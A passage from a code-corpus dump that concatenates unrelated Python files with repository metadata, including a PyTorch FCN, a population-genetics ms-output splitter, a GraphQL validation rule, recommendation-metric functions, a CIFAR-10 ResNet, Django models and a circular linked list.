        tuple: (dict mapping word -> id, list with one id per word of `text`).
    """
    # BUG FIX: the original read the module-level global `input` and ignored
    # its `text` parameter entirely; operate on the argument instead.
    words = text.replace('.', '').replace(',', '').replace("'", '').replace('-', '').split()
    word_ids = {}      # word -> first-appearance index (1-based); was named `dict`, shadowing the builtin
    sequence = []      # id of every word, in input order
    next_id = 0
    for word in words:
        if word not in word_ids:
            next_id += 1
            word_ids[word] = next_id
        sequence.append(word_ids[word])
    return word_ids, sequence
# Read the raw text and print its (word->id dictionary, id sequence) encoding.
# NOTE(review): this global is named `input`, shadowing the builtin input();
# verify nothing else relies on the global before renaming it.
input = read("input.txt")
print(encode(input))
f3c5b2deca8e963e01351dfa95d4302011c004f6 | Python | standardgalactic/R-GAP | /models/FCN3.py | UTF-8 | 983 | 2.578125 | 3 | [] | no_license | import torch.nn as nn
from collections import OrderedDict
class FCN3(nn.Module):
    """Fully connected net 784 -> 1000 -> 100 -> 1 with LeakyReLU(0.2) after
    each bias-free linear layer."""

    def __init__(self):
        super(FCN3, self).__init__()
        # A single shared activation module instance is reused in every stage.
        leaky = nn.LeakyReLU(negative_slope=0.2)
        widths = [(784, 1000), (1000, 100), (100, 1)]
        self.body = nn.ModuleList([
            nn.Sequential(OrderedDict([
                ('layer', nn.Linear(fan_in, fan_out, bias=False)),
                ('act', leaky)
            ]))
            for fan_in, fan_out in widths
        ])

    def forward(self, x):
        """Return (output, list of the input shape seen by each linear layer)."""
        seen_shapes = []
        for stage in self.body:
            if isinstance(stage.layer, nn.Linear):
                # Collapse everything but the batch dimension before a Linear.
                x = x.flatten(1)
            seen_shapes.append(x.shape)
            x = stage(x)
        return x, seen_shapes

    @staticmethod
    def name():
        return 'FCN3'
| true |
35a2839727637152390f27f1c176df63b0c5a6c3 | Python | kr-colab/msUtils | /splitMsOutputIntoWindows.py | UTF-8 | 4,620 | 2.671875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
import sys, gzip
# Command line: <msFile | "stdin"> <number of windows> <output file prefix>
msFile,numWins,winFilePrefix = sys.argv[1:]
numWins = int(numWins)
def getSnpWindowAssignments(positions, numWins):
    """Map each position in [0, 1] to the index of its window.

    The unit interval is split into `numWins` half-open windows
    (winStart, winEnd], with position 0 assigned to window 0. Positions are
    scanned with a single forward-moving window, so they must be
    non-decreasing (as in sorted ms output).
    """
    if numWins > 10000:
        sys.exit("Let's not get carried away with the number of windows . . .\n")
    width = 1.0 / numWins
    lo, hi, win = 0.0, width, 0
    assignments = []
    for pos in positions:
        # Advance the window until it contains `pos`.
        while not ((pos > lo or pos == 0) and pos <= hi):
            lo = hi
            hi += width
            win += 1
            # Snap the final boundary to exactly 1.0 to dodge float drift.
            if abs(1.0 - hi) < 1e-9:
                hi = 1.0
        assignments.append(win)
    return assignments
def getWinRange(fileIndex, numWins, delta):
    """Return (start, end) of window `fileIndex` in [0, 1], where `delta`
    is the window width; the last end is snapped to exactly 1.0."""
    start = fileIndex / float(numWins)
    end = 1.0 if abs(1.0 - (start + delta)) < 1e-9 else start + delta
    return start, end
def getSegSitesForFiles(snpWindowAssignments, positions, numWins, outFileLs):
    """Per output window, compute the SNP count and the SNP positions rescaled
    to [0, 1] within that window.

    Returns:
        (counts, positions_per_window): a list of ints and a list of lists,
        both with one entry per element of `outFileLs`.
    """
    counts = [0] * len(outFileLs)
    winPositions = [[] for _ in outFileLs]
    delta = 1.0 / numWins
    for winIdx, pos in zip(snpWindowAssignments, positions):
        winStart, _ = getWinRange(winIdx, numWins, delta)
        # Rescale the global position into window-local coordinates.
        winPositions[winIdx].append((pos - winStart) / delta)
        counts[winIdx] += 1
    return counts, winPositions
def processSimulation(samples, snpWindowAssignments, positions, numWins, outFileLs):
    """Append one simulation's ms-format record to every window's buffer.

    Each buffer gets a "//" header with its own segsite count and rescaled
    positions, then one row per sample containing only the columns assigned
    to that window. `outFileLs` is mutated in place.
    """
    counts, winPositions = getSegSitesForFiles(snpWindowAssignments, positions, numWins, outFileLs)
    for w in range(len(outFileLs)):
        posStr = " ".join(str(p) for p in winPositions[w])
        outFileLs[w] += "\n//\nsegsites: %s\npositions: %s\n" % (counts[w], posStr)
    for sample in samples:
        # Route each column (SNP) of this haplotype to its window's buffer.
        for col in range(len(sample)):
            outFileLs[snpWindowAssignments[col]] += sample[col]
        for w in range(len(outFileLs)):
            outFileLs[w] += "\n"
# Open the input: "stdin" reads standard input; *.gz is transparently gunzipped.
if msFile == "stdin":
    isFile = False
    msStream = sys.stdin
else:
    isFile = True
    if msFile.endswith(".gz"):
        msStream = gzip.open(msFile)
    else:
        msStream = open(msFile)
# ms header line: "<program> <numSamples> <numSims> ..."
header = msStream.readline()
program,numSamples,numSims = header.strip().split()[:3]
numSamples,numSims = int(numSamples),int(numSims)
#initialize list of output files
# One in-memory buffer (and output name) per window; the fake command line on
# the first buffer line mimics ms output so downstream parsers accept it.
outFileLs = []
outFileNameLs = []
for i in range(numWins):
    outFileNameLs.append("%s_%s.msWin" %(winFilePrefix,i))
    outFileLs.append("./windowedMSOutput %s %s\nblah\n" %(numSamples,numSims))
processedSims = 0
#advance to first simulation
line = msStream.readline()
while not line.startswith("//"):
    line = msStream.readline()
# Parse one simulation per iteration: "//", "segsites: N", "positions: ...",
# then numSamples haplotype rows; any deviation aborts loudly.
while line:
    if not line.startswith("//"):
        sys.exit("Malformed ms-style output file: read '%s' instead of '//'. AAAARRRRGGHHH!!!!!\n" %(line.strip()))
    segsitesBlah,segsites = msStream.readline().strip().split()
    segsites = int(segsites)
    if segsitesBlah != "segsites:":
        sys.exit("Malformed ms-style output file. AAAARRRRGGHHH!!!!!\n")
    positionsLine = msStream.readline().strip().split()
    if not positionsLine[0] == "positions:":
        sys.exit("Malformed ms-style output file. AAAARRRRGGHHH!!!!!\n")
    positions = [float(x) for x in positionsLine[1:]]
    snpWindowAssignments = getSnpWindowAssignments(positions,numWins)
    samples = []
    for i in range(numSamples):
        sampleLine = msStream.readline().strip()
        if len(sampleLine) != segsites:
            sys.exit("Malformed ms-style output file %s segsites but %s columns in line: %s; line %s of %s samples AAAARRRRGGHHH!!!!!\n" %(segsites,len(sampleLine),sampleLine,i,numSamples))
        samples.append(sampleLine)
    if len(samples) != numSamples:
        raise Exception
    # Distribute this simulation's columns across the per-window buffers.
    processSimulation(samples,snpWindowAssignments,positions,numWins,outFileLs)
    processedSims += 1
    line = msStream.readline()
    #advance to the next non-empty line or EOF
    while line and line.strip() == "":
        line = msStream.readline()
if processedSims != numSims:
    sys.exit("Malformed ms-style output file: %s of %s sims processed. AAAARRRRGGHHH!!!!!\n" %(processedSims,numSims))
# Flush each window's buffer to its .msWin file.
for i in range(len(outFileLs)):
    outFile = open(outFileNameLs[i], "w")
    outFile.write(outFileLs[i])
    outFile.close()
if isFile:
    msStream.close()
| true |
2f563e7cfffcd371dfcfe43f56a70c50a57dcd44 | Python | tartiflette/tartiflette | /tartiflette/language/validators/query/input_object_field_uniqueness.py | UTF-8 | 1,495 | 2.625 | 3 | [
"MIT"
] | permissive | from tartiflette.language.validators.query.rule import (
June2018ReleaseValidationRule,
)
from tartiflette.language.validators.query.utils import find_nodes_by_name
from tartiflette.utils.errors import graphql_error_from_nodes
class InputObjectFieldUniqueness(June2018ReleaseValidationRule):
    """
    This validator validates that Field in an input object are Unique
    > No field share the same name.
    More details @ https://graphql.github.io/graphql-spec/June2018/#sec-Input-Object-Field-Uniqueness
    """

    RULE_NAME = "input-object-field-uniqueness"
    RULE_LINK = "https://graphql.github.io/graphql-spec/June2018/#sec-Input-Object-Field-Uniqueness"
    RULE_NUMBER = "5.6.3"

    def validate(self, path, input_fields, **__):
        """Return one error per field name that appears more than once."""
        errors = []
        reported = set()  # names already turned into an error (report each once)
        for field_node in input_fields:
            name = field_node.name.value
            if name in reported:
                continue
            duplicates = find_nodes_by_name(input_fields, name)
            if len(duplicates) < 2:
                continue
            reported.add(name)
            errors.append(
                graphql_error_from_nodes(
                    message=f"Can't have multiple Input Field named < {name} >.",
                    path=path,
                    nodes=duplicates,
                    extensions=self._extensions,
                )
            )
        return errors
| true |
26488993607ffd74570b7136a8833ec753a41720 | Python | Kawser-nerd/CLCDSA | /Source Codes/AtCoder/abc033/C/4793930.py | UTF-8 | 107 | 3.296875 | 3 | [] | no_license | s = input()
# Count the "+"-separated terms of the formula that contain no '0' digit.
terms = s.split("+")
cnt = sum(1 for term in terms if "0" not in term)
print(cnt)
e8a0f9624380e0ea7b74febeb0a873a7c2e3f5bf | Python | cameronkelahan/AstroResearch | /kerasHeatMaps.py | UTF-8 | 3,739 | 2.90625 | 3 | [] | no_license | import numpy as np
from keras.models import load_model
from sklearn import metrics
import matplotlib.pyplot as plt
# Plot a 101x101 predicted-probability heat map over the (L12, Lx) unit square.
def plot(model, title, saveName):
    """Render `model`'s maser-probability heat map with `title`.

    `saveName` is the intended PDF path, but the savefig call below is
    commented out, so the figure is only shown interactively.
    """
    # Create the x and y axis values (0 - 1 stepping by .1)
    # xAxis = np.linspace(0, 1, num=11)
    # yAxis = np.linspace(0, 1, num=11)
    # Create the x and y axis values (0 - 1 stepping by .01)
    xAxis = np.linspace(0, 1, num=101)
    yAxis = np.linspace(0, 1, num=101)
    # Grid of (x, y) feature pairs covering [0, 1] x [0, 1].
    predX = []
    for x in xAxis:
        for y in yAxis:
            predX.append([x, y])
    predProb = model.predict_proba(np.array(predX))
    # NOTE(review): predClass is computed but never used below.
    predClass = model.predict(np.array(predX))
    # # Unused with the NN predict class
    # predMaser = predProb[:,1]
    # predMaser = predMaser.reshape(11, 11)
    # Reshape the flat predictions back onto the grid; transpose so Lx is vertical.
    predMaser = predProb.reshape(101, 101)
    predMaser = predMaser.transpose()
    plt.figure(figsize=(6.4, 4.8))
    plt.imshow(predMaser, origin='lower', extent=[0,1,0,1])
    plt.xticks(np.arange(.2, 1.1, step=0.2)) # Set label locations
    cbar = plt.colorbar()
    cbar.ax.tick_params(labelsize=16)
    cbar.set_label('Predicted Prob of Maser', fontsize=16)
    plt.clim(vmin=0, vmax=1)
    # NOTE(review): Colorbar.set_clim is deprecated/removed in newer matplotlib;
    # plt.clim above already fixes the colour limits — confirm before upgrading.
    cbar.set_clim(0,1)
    # plt.text(-10, 50, t, family='serif', ha='right', wrap=True)
    plt.title(title)
    plt.xlabel('L12',fontsize=16)
    plt.ylabel('Lx',fontsize=16)
    plt.xticks(fontsize=16)
    plt.yticks(fontsize=16)
    # Save as a PDF
    # plt.savefig(saveName, dpi=400, bbox_inches='tight', pad_inches=0.05)
    plt.show()
    plt.clf()
    plt.close()
############################# HEAT MAP OF NN BASED ON UNWEIGHTED KNN DATASETS##########################################
###################### Load the models which were trained using the data from Unw KNN Dataset 1
# Pre-trained Keras models of increasing depth; file names encode the layer widths.
model80Acc3Layer = load_model('./DataSetUnwKNN80+Acc/NeuralNetworkInfo/kerasModel3Layer_12_8_1.h5')
model80Acc4Layer = load_model('./DataSetUnwKNN80+Acc/NeuralNetworkInfo/kerasModel4Layer_8_12_4_1.h5')
model80Acc6Layer = load_model('./DataSetUnwKNN80+Acc/NeuralNetworkInfo/kerasModel6LayerEpoch550_10_10_20_50_17_1.h5')
model80Acc10Layer = load_model('./DataSetUnwKNN80+Acc/NeuralNetworkInfo/kerasModel10LayerEpoch550_10_10_20_25_30_50_17_12_8_1.h5')
################ 3 Layer NN Heat Map
plot(model80Acc3Layer, "3-Layer NN Maser Classification Probability Heat Map",
     './DataSetUnwKNN80+Acc/KerasProbHeatMap3Layer.pdf')
################# 4 Layer NN Heat Map
plot(model80Acc4Layer, "4-Layer NN Maser Classification Probability Heat Map",
     './DataSetUnwKNN80+Acc/KerasProbHeatMap4Layer.pdf')
################# 6 Layer NN Heat Map
plot(model80Acc6Layer, "6-Layer NN Maser Classification Probability Heat Map",
     './DataSetUnwKNN80+Acc/KerasProbHeatMap6Layer.pdf')
################# 10 Layer NN Heat Map
plot(model80Acc10Layer, "10-Layer NN Maser Classification Probability Heat Map",
     './DataSetUnwKNN80+Acc/KerasProbHeatMap10Layer.pdf')
############################# HEAT MAP OF NN BASED ON NN DATASETS#######################################################
# These models were trained by swapping out training sets every epoch
model82F1_3LayerV2 = load_model('./NNDataSelectionV2/3LayerModelF182/3LayerNNModel.h5')
model84F1_4LayerV2 = load_model('./NNDataSelectionV2/4LayerModelF184/4LayerNNModel.h5')
################# 3 Layer NN Heat Map V2
plot(model82F1_3LayerV2, "3-Layer NN Maser Classification Probability Heat Map",
     './NNDataSelectionV2/3LayerModelF182/heatMap3Layer.pdf')
################# 4 Layer NN Heat Map V2
plot(model84F1_4LayerV2, "4-Layer NN Maser Classification Probability Heat Map",
     './NNDataSelectionV2/4LayerModelF184/heatMap4Layer.pdf')
| true |
65e5b9f9ee0b127134aceea181db1a7bdae36122 | Python | Branch321/Throwing_Ds | /player.py | UTF-8 | 2,003 | 3.203125 | 3 | [] | no_license | # This module will contain a "player" class that will hold all statuses/attributes
import configparser
import datetime
class player:
    """
    Holds one character's stats and statuses, loaded from characters/<name>.ini.

    Attributes:
        benny_counter: number of bennies the player has (starts at 3).
        traits: attribute/skill name -> value (raw ini strings).
        weapons_dictionary: weapon name -> description (raw ini strings).
        wound_count / fat_count: current wounds and fatigue (ints from the ini).
        shaken / incap: status flags, initially False.
        session_duration: timestamp of when this session started.
    """
    def __init__(self, name_of_character):
        self.benny_counter = 3
        self.traits = {}
        self.weapons_dictionary = {}
        # Load the character sheet from its ini file.
        self.config = configparser.ConfigParser()
        self.config.read('characters/' + name_of_character + '.ini')
        self.name_of_character = name_of_character
        for trait_name in self.config['traits']:
            self.traits[trait_name] = self.config['traits'][trait_name]
        self.wound_count = int(self.config['wounds']['wounds'])
        self.fat_count = int(self.config['fatigue']['fatigue'])
        self.shaken = False
        self.session_duration = datetime.datetime.now()
        self.incap = False
        self.name = self.config['name']['name']
        for weapon_name in self.config['weapons']:
            self.weapons_dictionary[weapon_name] = self.config['weapons'][weapon_name]

    # Used when exiting the program: push current totals back into the config.
    def time_to_quit(self):
        """
        Write the wound/fatigue counters back into the in-memory config.
        Persisting to disk is deliberately disabled.
        """
        self.config.set("wounds", "wounds", str(self.wound_count))
        self.config.set("fatigue", "fatigue", str(self.fat_count))
        # with open("player.ini", 'w') as file:
        #     self.config.write(file)
| true |
38dd257514bc4cf2c403ea1f96ec0ab9b1be1727 | Python | gescobedo/ddpg-hgru4rec | /modules/evaluate.py | UTF-8 | 4,653 | 2.921875 | 3 | [
"MIT"
] | permissive | import torch
from scipy.special.cython_special import logit
def get_recall(indices, targets, batch_wise=False):
    """Recall@k: fraction of targets found among the top-k predictions.

    Args:
        indices: (B, k) LongTensor of top-k predicted item indices.
        targets: (B,) LongTensor of ground-truth item indices.
        batch_wise: if True, return a (B, 1) per-row 0/1 hit tensor instead
            of a scalar.
    """
    expanded = targets.view(-1, 1).expand_as(indices)  # (B, k)
    matches = expanded == indices
    if batch_wise:
        return (matches * 1.0).sum(dim=-1).view(-1, 1)
    hit_count = matches.nonzero().size(0)
    if hit_count == 0:
        return 0
    return hit_count / expanded.size(0)
def get_mrr(indices, targets, batch_wise=False):
    """MRR@k: mean reciprocal rank of each target within the top-k predictions.

    Args:
        indices: (B, k) LongTensor of top-k predicted item indices.
        targets: (B,) LongTensor of ground-truth item indices.
        batch_wise: if True, return a (B, 1) tensor of per-row reciprocal
            ranks (0.0 where the target is absent) instead of a scalar mean.
            NOTE: the batch-wise path allocates on CUDA, as the original did —
            it assumes a GPU is available.

    Returns:
        float scalar MRR, or a (B, 1) tensor when `batch_wise` is True.
    """
    targets = targets.view(-1, 1).expand_as(indices)
    hits = (targets == indices).nonzero()  # rows of (example_idx, rank_idx)
    if len(hits) == 0:
        if batch_wise:
            return torch.zeros(targets.shape[0], 1).cuda()
        return 0
    # Ranks within the top-k are 1-based.
    ranks = (hits[:, -1] + 1).float()
    if batch_wise:
        # Fix: removed a leftover debugging `import pdb` and a dead
        # `if len(hits) > 0` check (guaranteed true on this path).
        buffer = torch.zeros(targets.shape[0]).cuda()
        buffer[hits[:, 0]] = torch.reciprocal(ranks)
        return buffer.view(-1, 1)
    return (torch.sum(torch.reciprocal(ranks)) / targets.size(0)).item()
def evaluate(logits, targets, k=20, batch_wise=False):
    """Recall@k and MRR@k for predicted logits against the true next items.

    Args:
        logits: (B, C) scores over the item catalogue.
        targets: (B,) LongTensor of ground-truth item indices.

    Returns:
        (recall, mrr) — scalars, or (B, 1) tensors when `batch_wise` is True.
    """
    _, topk = torch.topk(logits, k, -1)
    return get_recall(topk, targets, batch_wise), get_mrr(topk, targets, batch_wise)
def evaluate_with_ranks(logits, targets, k=20, batch_wise=False):
    """Recall@k, MRR@k, and the full 1-based rank of every target item.

    A target's rank is 1 + the number of items scored strictly higher.
    """
    transposed = logits.t()
    target_scores = transposed[targets].diag()      # score of each row's true item
    ranks = (transposed > target_scores).sum(0) + 1
    mrr, recall = get_metrics_from_ranks(batch_wise, k, ranks)
    return recall, mrr, ranks
def get_metrics_from_ranks(batch_wise, k, ranks):
    """Derive (mrr, recall) at cutoff `k` from 1-based target ranks.

    When `batch_wise`, both are returned as (B, 1) tensors; otherwise as
    scalar means over the batch.
    """
    within_k = (ranks <= k).float()
    reciprocal = within_k / ranks.float()  # 1/rank inside the top-k, else 0
    if batch_wise:
        return reciprocal.view(-1, 1), within_k.view(-1, 1)
    return reciprocal.mean(), within_k.mean()
def evaluate_multiple_with_ranks(logits, targets, eval_cutoffs=[5, 10, 20], batch_wise=False):
    """Recall@k / MRR@k at several cutoffs, plus the raw 1-based target ranks.

    Returns:
        (recall_list, mrr_list, ranks) with one entry per cutoff.
    """
    transposed = logits.t()
    ranks = (transposed > transposed[targets].diag()).sum(0) + 1
    recall, mrr = [], []
    for cutoff in eval_cutoffs:
        mrr_at_k, recall_at_k = get_metrics_from_ranks(batch_wise, cutoff, ranks)
        recall.append(recall_at_k)
        mrr.append(mrr_at_k)
    return recall, mrr, ranks
def evaluate_multiple(logits, targets, eval_cutoffs=[5, 10, 20], batch_wise=False):
    """Recall@k and MRR@k at several cutoffs from one top-max(k) ranking.

    Args:
        logits: (B, C) scores over the item catalogue.
        targets: (B,) LongTensor of ground-truth item indices.

    Returns:
        (recall_list, mrr_list) with one entry per cutoff.
    """
    _, top_indices = torch.topk(logits, max(eval_cutoffs), -1)
    recall, mrr = [], []
    for cutoff in eval_cutoffs:
        prefix = top_indices[:, :cutoff]   # top-`cutoff` is a prefix of the ranking
        recall.append(get_recall(prefix, targets, batch_wise))
        mrr.append(get_mrr(prefix, targets, batch_wise))
    return recall, mrr
return recall, mrr
# Test
# torch.random.manual_seed(0)
#B, C, K = 5, 100, 5
#logits = torch.rand(B, C).cuda()
#targets = torch.randint(C, (B,)).cuda()
#print(targets)
# evaluate_with_ranks(logits, targets,K,False)
# evaluate_with_ranks(logits, targets,K,True)
#print(torch.cat(evaluate_multiple_with_ranks(logits, targets,batch_wise=True)[0],-1))
#print(torch.cat(evaluate_multiple(logits, targets,batch_wise=True)[0],-1))
| true |
7189c092484ed1c3c9599ee85ca70db82951dc7b | Python | xingyuyinxin/AI | /Resnet.py | UTF-8 | 2,727 | 2.71875 | 3 | [] | no_license | import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.models import Model
from keras.datasets import cifar10
import numpy as np
import os
from keras.regularizers import l2
# Load CIFAR-10 and scale pixel values to [0, 1].
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train / 255
x_test = x_test / 255
# One-hot encode the 10 class labels.
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
def resnet_block(inputs, num_filters=16,
                 kernel_size=3, strides=1,
                 activation='relu'):
    """Conv2D -> BatchNorm -> optional activation building block.

    Args:
        inputs: input Keras tensor.
        num_filters / kernel_size / strides: Conv2D parameters ('same' padding).
        activation: activation name, or None / 'None' for a linear block
            (used for the residual branch that is only activated after the add).
    """
    x = Conv2D(num_filters, kernel_size=kernel_size, strides=strides, padding='same')(inputs)
    x = BatchNormalization()(x)
    # BUG FIX: the original tested `if (activation)`, which is truthy for the
    # string 'None' that resnet_v1 passes to request *no* activation, so every
    # residual branch got a ReLU anyway. Skip for None/'None', and honour the
    # requested activation name instead of hard-coding 'relu'.
    if activation and activation != 'None':
        x = Activation(activation)(x)
    return x
def resnet_v1(input_shape):
    """Build a 20-layer ResNet-v1 style Keras classifier (10 classes) for
    images of `input_shape` (e.g. (32, 32, 3))."""
    inputs = Input(shape=input_shape)
    # Layer 1: stem block
    x = resnet_block(inputs)
    print('layer1,xshape:', x.shape)
    # Layers 2~7: six residual units at 16 filters
    for i in range(6):
        a = resnet_block(inputs=x)
        b = resnet_block(inputs=a, activation='None')
        x = keras.layers.add([x, b])
        x = Activation('relu')(x)
    # out:32*32*16
    # Layers 8~13: six residual units at 32 filters; first unit downsamples (stride 2)
    for i in range(6):
        if i == 0:
            a = resnet_block(inputs=x, strides=2, num_filters=32)
        else:
            a = resnet_block(inputs=x, num_filters=32)
        b = resnet_block(inputs=a, activation='None', num_filters=32)
        if i == 0:
            # Projection shortcut so the skip connection matches the new shape.
            x = Conv2D(32, kernel_size=3, strides=2, padding='same')(x)
        x = keras.layers.add([x, b])
        x = Activation('relu')(x)
    # out:16*16*32
    # Layers 14~19: six residual units at 64 filters; first unit downsamples
    for i in range(6):
        if i == 0:
            a = resnet_block(inputs=x, strides=2, num_filters=64)
        else:
            a = resnet_block(inputs=x, num_filters=64)
        b = resnet_block(inputs=a, activation='None', num_filters=64)
        if i == 0:
            x = Conv2D(64, kernel_size=3, strides=2, padding='same')(x)
        x = keras.layers.add([x, b]) # element-wise add: x and b must have identical shapes
        x = Activation('relu')(x)
    # out:8*8*64
    # Layer 20: pool + classifier head
    x = AveragePooling2D(pool_size=2)(x)
    # out:4*4*64
    y = Flatten()(x)
    # out:1024
    outputs = Dense(10, activation='softmax')(y)
    model = Model(inputs=inputs, outputs=outputs)
    return model
# Build, compile, and train the network; report accuracy on the test split.
model = resnet_v1((32, 32, 3))
model.compile(loss='categorical_crossentropy',
              optimizer=Adam(),
              metrics=['accuracy'])
# NOTE(review): the test set doubles as validation_data here — no separate
# validation split is held out.
model.fit(x_train, y_train, batch_size=64, epochs=200, validation_data=(x_test, y_test), verbose=1)
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
| true |
2292b1e8c5080fbb1169f40cd158e8b33d976f2a | Python | mounikamoparthi/DjangoQuotes | /apps/app_quotes/models.py | UTF-8 | 1,901 | 2.578125 | 3 | [] | no_license | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from ..app_login.models import User
from django.db import models
# Create your models here.
class QuoteManager(models.Manager):
    # Manager with validation/creation helpers for Quote objects.
    # NOTE: this file uses legacy Python 2 `print` statements.
    def addquotes(request,postData,sessiondata):
        # NOTE(review): the first parameter receives the bound manager instance
        # when called on Quote.objects — effectively `self` despite the name;
        # confirm against the call sites.
        print postData
        results = {'status': True, 'errors': []}
        # Validate the two form fields, collecting every error message.
        if not postData['Quoted By'] or len(postData['Quoted By'])<3:
            print "In quotes "
            results['status'] = False
            results['errors'].append("Please enter a valid name")
        if not postData['message'] or len(postData['message'])<10:
            print "In quotes_messages "
            results['status'] = False
            results['errors'].append("Please enter a valid message")
        if results['status']:
            # Create the quote owned by the logged-in user from the session.
            user1 = User.objects.get(id = sessiondata['userid'])
            Quote1 = Quote.objects.create(quotedby=postData['Quoted By'],
                message=postData['message'],userquotes = user1)
            print "ddfghjkl"
            results['status'] = True
            print "Successfully done!!!!!!!!!"
        return results
    def favquote(request,context):
        # Mark the quote context["quoteid"] as a favourite of user
        # context["userid"] via the many-to-many `otherquotes` relation.
        print context
        results = {'status': True, 'errors': []}
        Quote2=Quote.objects.get(id=context["quoteid"])
        user1=User.objects.get(id=context["userid"])
        Quote2.otherquotes.add(user1)
        print "join done!!!!!!!!!"
        results['status'] = True
        return results
class Quote(models.Model):
    # A quote posted by a user of the app.
    quotedby = models.CharField(max_length=1000)  # person the quote is attributed to
    message = models.TextField(max_length=1000)  # the quote text itself
    # Poster of the quote (one user owns many quotes).
    userquotes= models.ForeignKey('app_login.User', related_name="userquotes")
    # Users who marked this quote as a favourite (see QuoteManager.favquote).
    otherquotes = models.ManyToManyField('app_login.User', related_name="otherquotes")
    created_at = models.DateTimeField(auto_now_add = True)  # set once on insert
    updated_at = models.DateTimeField(auto_now = True)  # refreshed on every save
objects=QuoteManager() | true |
f303ce5967f09daedb58a6fb85907fdb6bd17b1c | Python | junwanghust/PythonCrashCourse-Exercises | /8/def_8_6.py | UTF-8 | 465 | 4.4375 | 4 | [] | no_license | # 编写一个名为city_country()的函数,它接受城市的名称及其所属的国家。
# The function should return a string formatted like this: "Santiago, Chile"
# Call the function with at least three city-country pairs and print each returned value.
def city_country(city, country):
    """Return *city* and *country* joined as a single "city, country" string."""
    return ', '.join([city, country])
# Exercise the function with three city/country pairs, as the exercise asks.
print(city_country('Qing dao', 'China'))
print(city_country('Shang hai', 'China'))
print(city_country('New york', 'America'))
| true |
def scan(sentence):
    """Tokenize *sentence* into (category, word) pairs for the mini adventure parser.

    Known words map to ('direction'|'verb'|'stop'|'noun', word); purely
    numeric tokens become ('number', int(token)).  Matching is
    case-sensitive, and unknown words are silently dropped (the original
    'error' handling was left commented out and is not reinstated here).
    """
    # Word -> category table; a dict gives O(1) lookup per word instead of
    # scanning a list of tuples for every token.
    lexicon = {
        'north': 'direction', 'south': 'direction',
        'east': 'direction', 'west': 'direction',
        'go': 'verb', 'walk': 'verb', 'run': 'verb',
        'kill': 'verb', 'eat': 'verb',
        'the': 'stop', 'in': 'stop', 'of': 'stop',
        'a': 'stop', 'an': 'stop',
        'bear': 'noun', 'princess': 'noun',
    }
    matched = []
    for word in sentence.split():
        if word in lexicon:
            matched.append((lexicon[word], word))
        if word.isdigit():  # numeric tokens become ('number', int)
            matched.append(('number', int(word)))
    return matched
| true |
ba94f1528e8695d3869e85c297c3a5a8cf28860b | Python | Lokeshwarrobo/Data-Structures | /Circular_Linked_List.py | UTF-8 | 3,338 | 3.703125 | 4 | [] | no_license | class Node:
    def __init__(self, data):
        # Payload plus the link to the next node (None until linked into a list).
        self.data = data
        self.next = None
class Circular_Linked_List:
    """Singly linked circular list.

    Bug fixes relative to the original version:
    * prepend() on an empty list now keeps the single node circular (it
      used to leave new_node.next as None, breaking traversal),
    * remove_element()/remove_node() can now unlink nodes anywhere in the
      list (they previously only worked on the head or the tail) and no
      longer crash on an empty list,
    * split() prints through self instead of the module-level global CL.
    """

    def __init__(self):
        self.head = None

    def append(self, data):
        """Insert *data* at the tail of the list."""
        new_node = Node(data)
        if self.head is None:
            self.head = new_node
            new_node.next = new_node
        else:
            tail = self.head
            while tail.next != self.head:
                tail = tail.next
            tail.next = new_node
            new_node.next = self.head

    def prepend(self, data):
        """Insert *data* at the front; the new node becomes the head."""
        new_node = Node(data)
        if self.head is None:
            self.head = new_node
            new_node.next = new_node  # bug fix: single node points at itself
        else:
            tail = self.head
            while tail.next != self.head:
                tail = tail.next
            new_node.next = self.head
            tail.next = new_node
            self.head = new_node

    def __len__(self):
        """Number of nodes in the list."""
        if self.head is None:
            return 0
        count = 1
        cur = self.head.next
        while cur != self.head:
            count += 1
            cur = cur.next
        return count

    def split(self):
        """Truncate self to its first half, print both halves, and return
        the second half as a new list.  Requires at least two nodes."""
        mid = len(self) // 2
        count = 0
        cur = self.head
        prev = None
        while cur and count < mid:
            prev = cur
            cur = cur.next
            count += 1
        prev.next = self.head  # close the first half back onto the head
        second = Circular_Linked_List()
        while cur.next != self.head:
            second.append(cur.data)
            cur = cur.next
        second.append(cur.data)
        self.print_list()  # bug fix: was CL.print_list() (module global)
        print("\n")
        second.print_list()
        return second

    def _unlink_head(self):
        # Remove the head node while keeping the list circular.
        if self.head.next == self.head:  # sole node
            self.head = None
            return
        tail = self.head
        while tail.next != self.head:
            tail = tail.next
        tail.next = self.head.next
        self.head = self.head.next

    def remove_element(self, key):
        """Remove every node whose data equals *key* (no-op on empty list)."""
        while self.head is not None and self.head.data == key:
            self._unlink_head()
        if self.head is None:
            return
        prev = self.head
        cur = self.head.next
        while cur != self.head:
            if cur.data == key:
                prev.next = cur.next
            else:
                prev = cur
            cur = cur.next

    def remove_node(self, node):
        """Unlink *node* from the list.  The removed node keeps its .next
        pointer so callers (josephus_circle) can keep traversing from it."""
        if self.head is None:
            return
        if self.head == node:
            self._unlink_head()
            return
        prev = self.head
        cur = self.head.next
        while cur != self.head:
            if cur == node:
                prev.next = cur.next
                return
            prev = cur
            cur = cur.next

    def josephus_circle(self, step):
        """Repeatedly eliminate every *step*-th node until one node remains."""
        cur = self.head
        while len(self) > 1:
            count = 1
            while count != step:
                cur = cur.next
                count += 1
            self.remove_node(cur)
            cur = cur.next  # removed node's .next still points into the list

    def print_list(self):
        """Print each node's data on its own line (one full cycle)."""
        cur = self.head
        while cur:
            print(cur.data)
            cur = cur.next
            if cur == self.head:
                break
# Quick manual exercise: build the circular list E -> A -> B -> C -> D,
# run a Josephus elimination with step 3, then print whatever remains.
CL = Circular_Linked_List()
CL.append("A")
CL.append("B")
CL.append("C")
CL.append("D")
CL.prepend("E")
CL.josephus_circle(3)
CL.print_list()
CL.remove_element("E") | true |
fc262adc7e1c8b7fff39b2443a91dabe91ef6cdc | Python | li199773/Web-Crawler | /6 WebSpider基础知识讲解/03 parse的使用和介绍.py | UTF-8 | 1,754 | 3.578125 | 4 | [] | no_license | """
url 只能由特定的字符组成,字母,数字,下划线
如果出现其他的,比如¥ 空格 中文等,就要对其进行编码
url.parse
